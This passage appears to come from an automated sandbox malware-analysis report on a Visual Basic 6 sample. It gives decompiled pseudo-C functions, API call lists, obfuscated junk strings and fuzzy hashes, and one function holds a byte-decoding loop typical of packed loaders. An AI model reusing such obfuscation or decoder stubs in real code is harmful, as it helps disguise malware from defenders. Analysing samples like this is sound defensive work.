__vbaFreeStr.MSVBVM60(00420D85), ref: 00420D77
__vbaFreeStr.MSVBVM60(00420D85), ref: 00420D7F

Strings

Subreptitiously, xrefs: 00420CD6
anoperineal, xrefs: 00420C8B

Memory Dump Source

Source File: 00000000.00000002.1191410623.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1191406489.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1191427193.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1191433235.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$Move$List$CheckHresultNew2$#517#520#522#535#607Chkstk
String ID: Subreptitiously$anoperineal
API String ID: 3004089779-3635317160
Opcode ID: 9285f5b71bd68eb526ec6191e2ec347f15cc334cef94e5b6a813a7f2195939c6
Instruction ID: 5a9ac057f2b00761fd0cccfbc01472d7fb5276d5a81c490ea93d9e8e28ce4da2
Opcode Fuzzy Hash: 9285f5b71bd68eb526ec6191e2ec347f15cc334cef94e5b6a813a7f2195939c6
Instruction Fuzzy Hash: F4810C71900218AFDB10EFE1DD46EDDB7B8AB44304F60447AE506BB1A1DB786A49CB58

Uniqueness

Uniqueness Score: -1.00%

Function 0041F192, Relevance: 49.2, APIs: 26, Strings: 2, Instructions: 177
COMMON

Download Yara Rule

C-Code - Quality: 51%

			E0041F192(void* __ebx, void* __ecx, void* __edi, void* __esi) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _v24;
				void* _v28;
				void* _v32;
				char _v36;
				char _v40;
				short _v48;
				char _v56;
				char _v72;
				char* _v96;
				intOrPtr _v104;
				char* _v112;
				char _v120;
				void* _v124;
				intOrPtr* _v128;
				signed int _v132;
				short _v136;
				intOrPtr* _v144;
				signed int _v148;
				intOrPtr* _v152;
				signed int _v156;
				char* _t78;
				signed int _t82;
				short _t87;
				char* _t90;
				char* _t94;
				signed int _t98;
				char* _t99;
				intOrPtr _t131;

				_push(0x401356);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t131;
				L00401350();
				_v12 = _t131;
				_v8 = 0x401248;
				if( *0x422010 != 0) {
					_v144 = 0x422010;
				} else {
					_push(0x422010);
					_push(0x403270);
					L00401578();
					_v144 = 0x422010;
				}
				_t78 =  &_v36;
				L00401566();
				_v128 = _t78;
				_t82 =  *((intOrPtr*)( *_v128 + 0x168))(_v128,  &_v124, _t78,  *((intOrPtr*)( *((intOrPtr*)( *_v144)) + 0x300))( *_v144));
				asm("fclex");
				_v132 = _t82;
				if(_v132 >= 0) {
					_v148 = _v148 & 0x00000000;
				} else {
					_push(0x168);
					_push(0x403c88);
					_push(_v128);
					_push(_v132);
					L00401572();
					_v148 = _t82;
				}
				_v48 = _v124;
				_v56 = 2;
				_push( &_v56);
				_push( &_v72);
				L004014CA();
				_v112 = L"Apollo";
				_v120 = 0x8008;
				_push( &_v72);
				_t87 =  &_v120;
				_push(_t87);
				L0040158A();
				_v136 = _t87;
				L0040156C();
				_push( &_v72);
				_push( &_v56);
				_push(2);
				L0040153C();
				_t90 = _v136;
				if(_t90 != 0) {
					if( *0x422010 != 0) {
						_v152 = 0x422010;
					} else {
						_push(0x422010);
						_push(0x403270);
						L00401578();
						_v152 = 0x422010;
					}
					_t94 =  &_v36;
					L00401566();
					_v128 = _t94;
					_t98 =  *((intOrPtr*)( *_v128 + 0x1b8))(_v128,  &_v40, _t94,  *((intOrPtr*)( *((intOrPtr*)( *_v152)) + 0x300))( *_v152));
					asm("fclex");
					_v132 = _t98;
					if(_v132 >= 0) {
						_v156 = _v156 & 0x00000000;
					} else {
						_push(0x1b8);
						_push(0x403c88);
						_push(_v128);
						_push(_v132);
						L00401572();
						_v156 = _t98;
					}
					_push(0);
					_push(0);
					_push(_v40);
					_t99 =  &_v56;
					_push(_t99);
					L00401500();
					_push(_t99);
					L004014DC();
					L00401560();
					_push(_t99);
					L00401530();
					L00401560();
					L00401554();
					_push( &_v40);
					_push( &_v36);
					_push(2);
					L00401512();
					L0040157E();
					_v96 = L"fraena";
					_v104 = 8;
					L004014BE();
					_push( &_v56);
					_push( &_v72);
					L004014C4();
					_push( &_v72);
					L004014DC();
					L00401560();
					_push( &_v72);
					_t90 =  &_v56;
					_push(_t90);
					_push(2);
					L0040153C();
				}
				_push(0x41f43b);
				L00401554();
				L00401554();
				return _t90;
			}

0x0041f197
0x0041f1a2
0x0041f1a3
0x0041f1af
0x0041f1b7
0x0041f1ba
0x0041f1c8
0x0041f1e5
0x0041f1ca
0x0041f1ca
0x0041f1cf
0x0041f1d4
0x0041f1d9
0x0041f1d9
0x0041f209
0x0041f20d
0x0041f212
0x0041f221
0x0041f227
0x0041f229
0x0041f230
0x0041f24f
0x0041f232
0x0041f232
0x0041f237
0x0041f23c
0x0041f23f
0x0041f242
0x0041f247
0x0041f247
0x0041f25a
0x0041f25e
0x0041f268
0x0041f26c
0x0041f26d
0x0041f272
0x0041f279
0x0041f283
0x0041f284
0x0041f287
0x0041f288
0x0041f28d
0x0041f297
0x0041f29f
0x0041f2a3
0x0041f2a4
0x0041f2a6
0x0041f2ae
0x0041f2b7
0x0041f2c4
0x0041f2e1
0x0041f2c6
0x0041f2c6
0x0041f2cb
0x0041f2d0
0x0041f2d5
0x0041f2d5
0x0041f305
0x0041f309
0x0041f30e
0x0041f31d
0x0041f323
0x0041f325
0x0041f32c
0x0041f34b
0x0041f32e
0x0041f32e
0x0041f333
0x0041f338
0x0041f33b
0x0041f33e
0x0041f343
0x0041f343
0x0041f352
0x0041f354
0x0041f356
0x0041f359
0x0041f35c
0x0041f35d
0x0041f365
0x0041f366
0x0041f370
0x0041f375
0x0041f376
0x0041f380
0x0041f388
0x0041f390
0x0041f394
0x0041f395
0x0041f397
0x0041f3a2
0x0041f3a7
0x0041f3ae
0x0041f3bb
0x0041f3c3
0x0041f3c7
0x0041f3c8
0x0041f3d0
0x0041f3d1
0x0041f3db
0x0041f3e3
0x0041f3e4
0x0041f3e7
0x0041f3e8
0x0041f3ea
0x0041f3ef
0x0041f3f2
0x0041f42d
0x0041f435
0x0041f43a

APIs

__vbaChkstk.MSVBVM60(?,00401356), ref: 0041F1AF
__vbaNew2.MSVBVM60(00403270,00422010,?,?,?,?,00401356), ref: 0041F1D4
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041F20D
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403C88,00000168), ref: 0041F242
#652.MSVBVM60(?,00000002), ref: 0041F26D
__vbaVarTstEq.MSVBVM60(00008008,?,?,00000002), ref: 0041F288
__vbaFreeObj.MSVBVM60(00008008,?,?,00000002), ref: 0041F297
__vbaFreeVarList.MSVBVM60(00000002,00000002,?,00008008,?,?,00000002), ref: 0041F2A6
__vbaNew2.MSVBVM60(00403270,00422010), ref: 0041F2D0
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041F309
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403C88,000001B8), ref: 0041F33E
__vbaLateIdCallLd.MSVBVM60(?,?,00000000,00000000), ref: 0041F35D
__vbaStrVarMove.MSVBVM60(00000000), ref: 0041F366
__vbaStrMove.MSVBVM60(00000000), ref: 0041F370
#517.MSVBVM60(00000000,00000000), ref: 0041F376
__vbaStrMove.MSVBVM60(00000000,00000000), ref: 0041F380
__vbaFreeStr.MSVBVM60(00000000,00000000), ref: 0041F388
__vbaFreeObjList.MSVBVM60(00000002,00000000,00000000,00000000,00000000), ref: 0041F397
__vbaFreeVar.MSVBVM60(?,00000000,00000000), ref: 0041F3A2
__vbaVarDup.MSVBVM60 ref: 0041F3BB
#528.MSVBVM60(?,?), ref: 0041F3C8
__vbaStrVarMove.MSVBVM60(?,?,?), ref: 0041F3D1
__vbaStrMove.MSVBVM60(?,?,?), ref: 0041F3DB
__vbaFreeVarList.MSVBVM60(00000002,?,?,?,?,?), ref: 0041F3EA
__vbaFreeStr.MSVBVM60(0041F43B), ref: 0041F42D
__vbaFreeStr.MSVBVM60(0041F43B), ref: 0041F435

Strings

fraena, xrefs: 0041F3A7
Apollo, xrefs: 0041F272

Memory Dump Source

Source File: 00000000.00000002.1191410623.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1191406489.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1191427193.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1191433235.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$Move$List$CheckHresultNew2$#517#528#652CallChkstkLate
String ID: Apollo$fraena
API String ID: 1415655392-2588804562
Opcode ID: 59f5dcca5672c1a5b75911184b91bca10f6cb5a8e95f866e08294c9c3c7a0de1
Instruction ID: b6663f7a68322d7130411c0858feab26486a9f91a3bf4bc1dc191d4bf66ed025
Opcode Fuzzy Hash: 59f5dcca5672c1a5b75911184b91bca10f6cb5a8e95f866e08294c9c3c7a0de1
Instruction Fuzzy Hash: 9E711A71900218ABDB10EFA1CD46FDDB7B8BB44304F60417AE506B71A2EB796A49CF58

Uniqueness

Uniqueness Score: -1.00%

Function 004201AA, Relevance: 38.7, APIs: 21, Strings: 1, Instructions: 174
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E004201AA(void* __ebx, void* __edi, void* __esi, signed int* _a24) {
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v28;
				void* _v32;
				void* _v36;
				signed int _v40;
				char _v44;
				intOrPtr _v52;
				char _v60;
				char _v76;
				char* _v100;
				intOrPtr _v108;
				intOrPtr _v116;
				char _v124;
				char _v128;
				intOrPtr* _v132;
				signed int _v136;
				void* _v140;
				signed int _v144;
				intOrPtr _v156;
				intOrPtr* _v160;
				signed int _v164;
				intOrPtr* _v168;
				signed int _v172;
				signed int _v176;
				char* _t90;
				signed int _t94;
				short _t98;
				signed int _t101;
				signed int _t112;
				signed int _t117;
				void* _t138;
				intOrPtr _t139;

				_t139 = _t138 - 0xc;
				_push(0x401356);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t139;
				L00401350();
				_v16 = _t139;
				_v12 = 0x4012a8;
				 *_a24 =  *_a24 & 0x00000000;
				if( *0x422010 != 0) {
					_v160 = 0x422010;
				} else {
					_push(0x422010);
					_push(0x403270);
					L00401578();
					_v160 = 0x422010;
				}
				_t90 =  &_v44;
				L00401566();
				_v132 = _t90;
				_t94 =  *((intOrPtr*)( *_v132 + 0x70))(_v132,  &_v128, _t90,  *((intOrPtr*)( *((intOrPtr*)( *_v160)) + 0x30c))( *_v160));
				asm("fclex");
				_v136 = _t94;
				if(_v136 >= 0) {
					_v164 = _v164 & 0x00000000;
				} else {
					_push(0x70);
					_push(0x403cf4);
					_push(_v132);
					_push(_v136);
					L00401572();
					_v164 = _t94;
				}
				_v52 = _v128;
				_v60 = 4;
				_push(0);
				_push( &_v60);
				_push( &_v76);
				L00401464();
				_v116 = 0x301dae;
				_v124 = 0x8003;
				_push( &_v76);
				_t98 =  &_v124;
				_push(_t98);
				L0040146A();
				_v140 = _t98;
				L0040156C();
				_push( &_v76);
				_push( &_v60);
				_push(2);
				L0040153C();
				_t101 = _v140;
				if(_t101 != 0) {
					_v100 = L"Frigrelsesmidlerne5";
					_v108 = 8;
					L004014BE();
					_push( &_v60);
					_push( &_v76);
					L0040145E();
					_push( &_v76);
					L004014DC();
					L00401560();
					_push( &_v76);
					_push( &_v60);
					_push(2);
					L0040153C();
					if( *0x4223fc != 0) {
						_v168 = 0x4223fc;
					} else {
						_push(0x4223fc);
						_push(0x403c68);
						L00401578();
						_v168 = 0x4223fc;
					}
					_v132 =  *_v168;
					_t112 =  *((intOrPtr*)( *_v132 + 0x14))(_v132,  &_v44);
					asm("fclex");
					_v136 = _t112;
					if(_v136 >= 0) {
						_v172 = _v172 & 0x00000000;
					} else {
						_push(0x14);
						_push(0x403c58);
						_push(_v132);
						_push(_v136);
						L00401572();
						_v172 = _t112;
					}
					_v140 = _v44;
					_t117 =  *((intOrPtr*)( *_v140 + 0x60))(_v140,  &_v40);
					asm("fclex");
					_v144 = _t117;
					if(_v144 >= 0) {
						_v176 = _v176 & 0x00000000;
					} else {
						_push(0x60);
						_push(0x403c78);
						_push(_v140);
						_push(_v144);
						L00401572();
						_v176 = _t117;
					}
					_t101 = _v40;
					_v156 = _t101;
					_v40 = _v40 & 0x00000000;
					L00401560();
					L0040156C();
				}
				L004014E2();
				asm("wait");
				_push(0x42047f);
				L00401554();
				L00401554();
				return _t101;
			}

0x004201ad
0x004201b0
0x004201bb
0x004201bc
0x004201c8
0x004201d0
0x004201d3
0x004201dd
0x004201e7
0x00420204
0x004201e9
0x004201e9
0x004201ee
0x004201f3
0x004201f8
0x004201f8
0x00420228
0x0042022c
0x00420231
0x00420240
0x00420243
0x00420245
0x00420252
0x00420271
0x00420254
0x00420254
0x00420256
0x0042025b
0x0042025e
0x00420264
0x00420269
0x00420269
0x0042027b
0x0042027e
0x00420285
0x0042028a
0x0042028e
0x0042028f
0x00420294
0x0042029b
0x004202a5
0x004202a6
0x004202a9
0x004202aa
0x004202af
0x004202b9
0x004202c1
0x004202c5
0x004202c6
0x004202c8
0x004202d0
0x004202d9
0x004202df
0x004202e6
0x004202f3
0x004202fb
0x004202ff
0x00420300
0x00420308
0x00420309
0x00420313
0x0042031b
0x0042031f
0x00420320
0x00420322
0x00420331
0x0042034e
0x00420333
0x00420333
0x00420338
0x0042033d
0x00420342
0x00420342
0x00420360
0x0042036f
0x00420372
0x00420374
0x00420381
0x004203a0
0x00420383
0x00420383
0x00420385
0x0042038a
0x0042038d
0x00420393
0x00420398
0x00420398
0x004203aa
0x004203c2
0x004203c5
0x004203c7
0x004203d4
0x004203f6
0x004203d6
0x004203d6
0x004203d8
0x004203dd
0x004203e3
0x004203e9
0x004203ee
0x004203ee
0x004203fd
0x00420400
0x00420406
0x00420413
0x0042041b
0x0042041b
0x00420428
0x0042042d
0x0042042e
0x00420471
0x00420479
0x0042047e

APIs

__vbaChkstk.MSVBVM60(?,00401356), ref: 004201C8
__vbaNew2.MSVBVM60(00403270,00422010,?,?,?,?,00401356), ref: 004201F3
__vbaObjSet.MSVBVM60(?,00000000), ref: 0042022C
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403CF4,00000070), ref: 00420264
#714.MSVBVM60(?,00000004,00000000), ref: 0042028F
__vbaVarTstGt.MSVBVM60(00008003,?,?,00000004,00000000), ref: 004202AA
__vbaFreeObj.MSVBVM60(00008003,?,?,00000004,00000000), ref: 004202B9
__vbaFreeVarList.MSVBVM60(00000002,00000004,?,00008003,?,?,00000004,00000000), ref: 004202C8
__vbaVarDup.MSVBVM60 ref: 004202F3
#518.MSVBVM60(?,?), ref: 00420300
__vbaStrVarMove.MSVBVM60(?,?,?), ref: 00420309
__vbaStrMove.MSVBVM60(?,?,?), ref: 00420313
__vbaFreeVarList.MSVBVM60(00000002,?,?,?,?,?), ref: 00420322
__vbaNew2.MSVBVM60(00403C68,004223FC,?,?,?,?,?,00401356), ref: 0042033D
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403C58,00000014), ref: 00420393
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403C78,00000060), ref: 004203E9
__vbaStrMove.MSVBVM60(00000000,?,00403C78,00000060), ref: 00420413
__vbaFreeObj.MSVBVM60(00000000,?,00403C78,00000060), ref: 0042041B
__vbaStrCopy.MSVBVM60(?,?,00401356), ref: 00420428
__vbaFreeStr.MSVBVM60(0042047F,?,?,00401356), ref: 00420471
__vbaFreeStr.MSVBVM60(0042047F,?,?,00401356), ref: 00420479

Strings

SVIRREFLUERS, xrefs: 00420420

Memory Dump Source

Source File: 00000000.00000002.1191410623.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1191406489.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1191427193.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1191433235.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$CheckHresultMove$ListNew2$#518#714ChkstkCopy
String ID: SVIRREFLUERS
API String ID: 33727100-728719633
Opcode ID: 2e444e48b92e1df4ae2b55f1567625bda0a961612bf173d21881f4e8a8afb4f5
Instruction ID: 39c2410c1533608043d100047c1538ccdb11ed767b8e65b20b36ea87a2b55a0f
Opcode Fuzzy Hash: 2e444e48b92e1df4ae2b55f1567625bda0a961612bf173d21881f4e8a8afb4f5
Instruction Fuzzy Hash: 7871F871E00228AFDB10EFA5DC85BDDBBB8BF04304F5040AAE545B71A1DB785A88DF59

Uniqueness

Uniqueness Score: -1.00%

Function 00420D98, Relevance: 36.8, APIs: 19, Strings: 2, Instructions: 98
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E00420D98(void* __ebx, void* __edi, void* __esi, void* _a20) {
				intOrPtr _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				short _v40;
				void* _v44;
				char* _v48;
				void* _v52;
				void* _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				char _v76;
				char _v92;
				intOrPtr _v116;
				char _v124;
				short _v128;
				short _t49;
				char* _t52;
				void* _t70;
				intOrPtr _t71;

				_t71 = _t70 - 0x18;
				_push(0x401356);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t71;
				_push(0x70);
				L00401350();
				_v28 = _t71;
				_v24 = 0x4012d8;
				_v20 = 0;
				_v16 = 0;
				_v8 = 1;
				L004014E2();
				_v8 = 2;
				_v68 = 0x93c9f3d0;
				_v64 = 0x5b05;
				_v76 = 6;
				_push(0xfffffffe);
				_push(0xfffffffe);
				_push(0xfffffffe);
				_push(0xffffffff);
				_push( &_v76);
				L00401422();
				L00401560();
				L0040157E();
				_v8 = 3;
				_push( &_v76);
				L00401476();
				_push( &_v76);
				_push( &_v92);
				L0040141C();
				_v116 = 0x6747;
				_v124 = 0x8002;
				_push( &_v92);
				_t49 =  &_v124;
				_push(_t49);
				L0040158A();
				_v128 = _t49;
				_push( &_v92);
				_push( &_v76);
				_push(2);
				L0040153C();
				_t52 = _v128;
				if(_t52 != 0) {
					_v8 = 4;
					_push(0xffffffff);
					L004014E8();
					_v8 = 5;
					_push(L"trinovantes");
					L00401416();
					_v48 = _t52;
					_v8 = 6;
					_push(0xf6);
					_push( &_v76);
					L00401410();
					_t52 =  &_v76;
					_push(_t52);
					L004014DC();
					L00401560();
					L0040157E();
				}
				_v8 = 8;
				L004013E6();
				_v60 = _t52;
				_v8 = 9;
				_v40 = 0x5d91;
				_push(0x420f20);
				L00401554();
				L00401554();
				L00401554();
				return _t52;
			}

0x00420d9b
0x00420d9e
0x00420da9
0x00420daa
0x00420db1
0x00420db4
0x00420dbc
0x00420dbf
0x00420dc6
0x00420dcd
0x00420dd4
0x00420de1
0x00420de6
0x00420ded
0x00420df4
0x00420dfb
0x00420e02
0x00420e04
0x00420e06
0x00420e08
0x00420e0d
0x00420e0e
0x00420e18
0x00420e20
0x00420e25
0x00420e2f
0x00420e30
0x00420e38
0x00420e3c
0x00420e3d
0x00420e42
0x00420e49
0x00420e53
0x00420e54
0x00420e57
0x00420e58
0x00420e5d
0x00420e64
0x00420e68
0x00420e69
0x00420e6b
0x00420e73
0x00420e79
0x00420e7b
0x00420e82
0x00420e84
0x00420e89
0x00420e90
0x00420e95
0x00420e9a
0x00420e9d
0x00420ea4
0x00420eac
0x00420ead
0x00420eb2
0x00420eb5
0x00420eb6
0x00420ec0
0x00420ec8
0x00420ec8
0x00420ecd
0x00420ed4
0x00420ed9
0x00420edc
0x00420ee3
0x00420ee9
0x00420f0a
0x00420f12
0x00420f1a
0x00420f1f

APIs

__vbaChkstk.MSVBVM60(?,00401356), ref: 00420DB4
__vbaStrCopy.MSVBVM60(?,?,?,?,00401356), ref: 00420DE1
#703.MSVBVM60(00000006,000000FF,000000FE,000000FE,000000FE), ref: 00420E0E
__vbaStrMove.MSVBVM60(00000006,000000FF,000000FE,000000FE,000000FE), ref: 00420E18
__vbaFreeVar.MSVBVM60(00000006,000000FF,000000FE,000000FE,000000FE), ref: 00420E20
#610.MSVBVM60(00000006,00000006,000000FF,000000FE,000000FE,000000FE), ref: 00420E30
#553.MSVBVM60(?,00000006,00000006,00000006,000000FF,000000FE,000000FE,000000FE), ref: 00420E3D
__vbaVarTstEq.MSVBVM60(00008002,?,?,?,?,?,?,00000006,00000006,00000006,000000FF,000000FE,000000FE,000000FE), ref: 00420E58
__vbaFreeVarList.MSVBVM60(00000002,00000006,?,00008002,?,?,?,?,?,?,00000006,00000006,00000006,000000FF,000000FE,000000FE), ref: 00420E6B
__vbaOnError.MSVBVM60(000000FF,?,?,00401356), ref: 00420E84
#578.MSVBVM60(trinovantes,000000FF,?,?,00401356), ref: 00420E95
#526.MSVBVM60(?,000000F6,trinovantes,000000FF,?,?,00401356), ref: 00420EAD
__vbaStrVarMove.MSVBVM60(?,?,000000F6,trinovantes,000000FF,?,?,00401356), ref: 00420EB6
__vbaStrMove.MSVBVM60(?,?,000000F6,trinovantes,000000FF,?,?,00401356), ref: 00420EC0
__vbaFreeVar.MSVBVM60(?,?,000000F6,trinovantes,000000FF,?,?,00401356), ref: 00420EC8
#615.MSVBVM60(?,?,00401356), ref: 00420ED4
__vbaFreeStr.MSVBVM60(00420F20), ref: 00420F0A
__vbaFreeStr.MSVBVM60(00420F20), ref: 00420F12
__vbaFreeStr.MSVBVM60(00420F20), ref: 00420F1A

Strings

trinovantes, xrefs: 00420E90
Gg, xrefs: 00420E42

Memory Dump Source

Source File: 00000000.00000002.1191410623.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1191406489.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1191427193.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1191433235.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$Move$#526#553#578#610#615#703ChkstkCopyErrorList
String ID: Gg$trinovantes
API String ID: 2274906189-1238276640
Opcode ID: 05462166a895a3b0b8bfd440eee1f7aab7ee3cc1090729341f7b87e60a6ac016
Instruction ID: 66e5e6bf6cda3d921ee97b728b76f79b6855b755ff4c33d1a487a7534e583792
Opcode Fuzzy Hash: 05462166a895a3b0b8bfd440eee1f7aab7ee3cc1090729341f7b87e60a6ac016
Instruction Fuzzy Hash: F3410171C0020CAADB10EFE5C946BDEBBB8AF44718F60412AF111BB1E1EB785649CB58

Uniqueness

Uniqueness Score: -1.00%

Function 00420F3D, Relevance: 27.2, APIs: 18, Instructions: 219
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E00420F3D(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v36;
				char _v48;
				short _v56;
				signed int _v60;
				signed int _v64;
				char _v68;
				char _v72;
				char _v88;
				intOrPtr _v96;
				char _v104;
				void* _v124;
				char _v128;
				intOrPtr* _v132;
				signed int _v136;
				intOrPtr* _v140;
				signed int _v144;
				short _v148;
				intOrPtr _v152;
				intOrPtr _v156;
				signed int _v168;
				intOrPtr* _v172;
				signed int _v176;
				intOrPtr* _v180;
				signed int _v184;
				intOrPtr* _v188;
				signed int _v192;
				signed int _v196;
				char* _t121;
				signed int _t125;
				char* _t131;
				signed int _t135;
				short _t139;
				char* _t146;
				signed int _t152;
				signed int _t157;
				char* _t159;
				void* _t180;
				void* _t182;
				intOrPtr _t183;

				_t183 = _t182 - 0xc;
				 *[fs:0x0] = _t183;
				L00401350();
				_v16 = _t183;
				_v12 = 0x401320;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx,  *[fs:0x0], 0x401356, _t180);
				_push(0x11);
				_push(0x404080);
				_push( &_v48);
				L004014B8();
				if( *0x422010 != 0) {
					_v172 = 0x422010;
				} else {
					_push(0x422010);
					_push(0x403270);
					L00401578();
					_v172 = 0x422010;
				}
				_t121 =  &_v68;
				L00401566();
				_v132 = _t121;
				_t125 =  *((intOrPtr*)( *_v132 + 0x1c8))(_v132,  &_v124, _t121,  *((intOrPtr*)( *((intOrPtr*)( *_v172)) + 0x300))( *_v172));
				asm("fclex");
				_v136 = _t125;
				if(_v136 >= 0) {
					_v176 = _v176 & 0x00000000;
				} else {
					_push(0x1c8);
					_push(0x403c88);
					_push(_v132);
					_push(_v136);
					L00401572();
					_v176 = _t125;
				}
				_push(_v124);
				_push( &_v88);
				L0040140A();
				if( *0x422010 != 0) {
					_v180 = 0x422010;
				} else {
					_push(0x422010);
					_push(0x403270);
					L00401578();
					_v180 = 0x422010;
				}
				_t131 =  &_v72;
				L00401566();
				_v140 = _t131;
				_t135 =  *((intOrPtr*)( *_v140 + 0x1e0))(_v140,  &_v64, _t131,  *((intOrPtr*)( *((intOrPtr*)( *_v180)) + 0x300))( *_v180));
				asm("fclex");
				_v144 = _t135;
				if(_v144 >= 0) {
					_v184 = _v184 & 0x00000000;
				} else {
					_push(0x1e0);
					_push(0x403c88);
					_push(_v140);
					_push(_v144);
					L00401572();
					_v184 = _t135;
				}
				_v168 = _v64;
				_v64 = _v64 & 0x00000000;
				_v96 = _v168;
				_v104 = 0x8008;
				_push( &_v88);
				_t139 =  &_v104;
				_push(_t139);
				L00401458();
				_v148 = _t139;
				_push( &_v72);
				_push( &_v68);
				_push(2);
				L00401512();
				_push( &_v104);
				_push( &_v88);
				_push(2);
				L0040153C();
				if(_v148 != 0) {
					if( *0x4223fc != 0) {
						_v188 = 0x4223fc;
					} else {
						_push(0x4223fc);
						_push(0x403c68);
						L00401578();
						_v188 = 0x4223fc;
					}
					_v132 =  *_v188;
					_t152 =  *((intOrPtr*)( *_v132 + 0x14))(_v132,  &_v68);
					asm("fclex");
					_v136 = _t152;
					if(_v136 >= 0) {
						_v192 = _v192 & 0x00000000;
					} else {
						_push(0x14);
						_push(0x403c58);
						_push(_v132);
						_push(_v136);
						L00401572();
						_v192 = _t152;
					}
					_v140 = _v68;
					_t157 =  *((intOrPtr*)( *_v140 + 0xc8))(_v140,  &_v124);
					asm("fclex");
					_v144 = _t157;
					if(_v144 >= 0) {
						_v196 = _v196 & 0x00000000;
					} else {
						_push(0xc8);
						_push(0x403c78);
						_push(_v140);
						_push(_v144);
						L00401572();
						_v196 = _t157;
					}
					_v56 = _v124;
					L0040156C();
					_t159 =  &_v48;
					_push(_t159);
					_push(1);
					L00401404();
					_v156 = _t159;
					_v152 = 1;
					_v60 = _v60 & 0x00000000;
					while(_v60 <= _v156) {
						asm("cdq");
						 *((char*)(_v36 + _v60)) = (_v60 + 0xe9) % 0xff;
						_v60 = _v60 + _v152;
					}
				}
				_push(0x4212ce);
				_v128 =  &_v48;
				_t146 =  &_v128;
				_push(_t146);
				_push(0);
				L004014D6();
				return _t146;
			}

0x00420f40
0x00420f4f
0x00420f5b
0x00420f63
0x00420f66
0x00420f6d
0x00420f7c
0x00420f7f
0x00420f81
0x00420f89
0x00420f8a
0x00420f96
0x00420fb3
0x00420f98
0x00420f98
0x00420f9d
0x00420fa2
0x00420fa7
0x00420fa7
0x00420fd7
0x00420fdb
0x00420fe0
0x00420fef
0x00420ff5
0x00420ff7
0x00421004
0x00421026
0x00421006
0x00421006
0x0042100b
0x00421010
0x00421013
0x00421019
0x0042101e
0x0042101e
0x00421031
0x00421035
0x00421036
0x00421042
0x0042105f
0x00421044
0x00421044
0x00421049
0x0042104e
0x00421053
0x00421053
0x00421083
0x00421087
0x0042108c
0x004210a4
0x004210aa
0x004210ac
0x004210b9
0x004210de
0x004210bb
0x004210bb
0x004210c0
0x004210c5
0x004210cb
0x004210d1
0x004210d6
0x004210d6
0x004210e8
0x004210ee
0x004210f8
0x004210fb
0x00421105
0x00421106
0x00421109
0x0042110a
0x0042110f
0x00421119
0x0042111d
0x0042111e
0x00421120
0x0042112b
0x0042112f
0x00421130
0x00421132
0x00421143
0x00421150
0x0042116d
0x00421152
0x00421152
0x00421157
0x0042115c
0x00421161
0x00421161
0x0042117f
0x0042118e
0x00421191
0x00421193
0x004211a0
0x004211bf
0x004211a2
0x004211a2
0x004211a4
0x004211a9
0x004211ac
0x004211b2
0x004211b7
0x004211b7
0x004211c9
0x004211e1
0x004211e7
0x004211e9
0x004211f6
0x0042121b
0x004211f8
0x004211f8
0x004211fd
0x00421202
0x00421208
0x0042120e
0x00421213
0x00421213
0x00421226
0x0042122d
0x00421232
0x00421235
0x00421236
0x00421238
0x0042123d
0x00421243
0x0042124d
0x0042125f
0x00421272
0x00421280
0x0042125c
0x0042125c
0x0042125f
0x00421284
0x004212bf
0x004212c2
0x004212c5
0x004212c6
0x004212c8
0x004212cd

APIs

__vbaChkstk.MSVBVM60(?,00401356), ref: 00420F5B
__vbaAryConstruct2.MSVBVM60(?,00404080,00000011,?,?,?,?,00401356), ref: 00420F8A
__vbaNew2.MSVBVM60(00403270,00422010,?,00404080,00000011,?,?,?,?,00401356), ref: 00420FA2
__vbaObjSet.MSVBVM60(?,00000000), ref: 00420FDB
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403C88,000001C8), ref: 00421019
#698.MSVBVM60(?,?), ref: 00421036
__vbaNew2.MSVBVM60(00403270,00422010,?,?), ref: 0042104E
__vbaObjSet.MSVBVM60(?,00000000), ref: 00421087
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403C88,000001E0), ref: 004210D1
__vbaVarTstNe.MSVBVM60(00008008,?), ref: 0042110A
__vbaFreeObjList.MSVBVM60(00000002,?,?,00008008,?), ref: 00421120
__vbaFreeVarList.MSVBVM60(00000002,?,?,?,?,00401356), ref: 00421132
